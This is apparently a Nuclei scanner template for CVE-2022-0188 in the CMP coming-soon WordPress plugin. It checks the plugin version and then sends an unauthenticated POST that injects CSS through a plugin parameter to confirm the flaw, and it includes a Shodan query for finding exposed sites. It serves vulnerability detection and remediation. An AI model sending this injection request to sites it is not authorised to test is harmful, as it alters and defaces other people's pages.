id: CVE-2022-0188 info: name: CMP WordPress < 4.0.19 - Broken Access Control author: pussycat0x severity: medium description: | CMP WordPress plugin < 4.0.19 contains an arbitrary page layout change caused by insufficient access control in the coming soon page feature, letting unauthenticated users modify the layout, exploit requires no authentication. reference: - https://wpscan.com/vulnerability/50b6f770-6f53-41ef-b2f3-2a58e9afd332/ impact: Unauthenticated users can alter the coming soon page layout, potentially misleading visitors or causing defacement. remediation: Update to version 4.0.19 or later. metadata: verified: true max-request: 3 shodan-query: html:"wp-content/plugins/cmp-coming-soon-maintenance" tags: cve,cve2022,wp-scan,wordpress,wp-plugin,cmp,intrusive flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt" matchers: - type: dsl dsl: - "status_code == 200" - compare_versions(version, '< 4.0.19') condition: and internal: true extractors: - type: regex part: body name: version group: 1 regex: - 'Stable tag: ([0-9.]+)' internal: true - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded niteoCS_footer_background_opacity_hardwork=0);body{background:url({{randstr}});}div{color:red - | GET / HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - "contains_all(body_2, '{{randstr}}','cmp-coming-soon-maintenance')" - "contains_any(body_2, 'niteoCS','cmp-theme','coming-soon')" - "status_code == 200" condition: and extractors: - type: regex name: injected-css part: body_2 group: 1 regex: - 'background:url\(([a-zA-Z0-9]+)\)' # digest: 4a0a0047304502203505af93572a3093ccf440dd1645e78d00042cc9cef657f25d664841fa2ca4ac022100a819d7f367cdf8e4f312afe56f45f9593ce46b8a29d3068fa1abb7bf774127bc:922c64590222798bb761d5b6d8e72950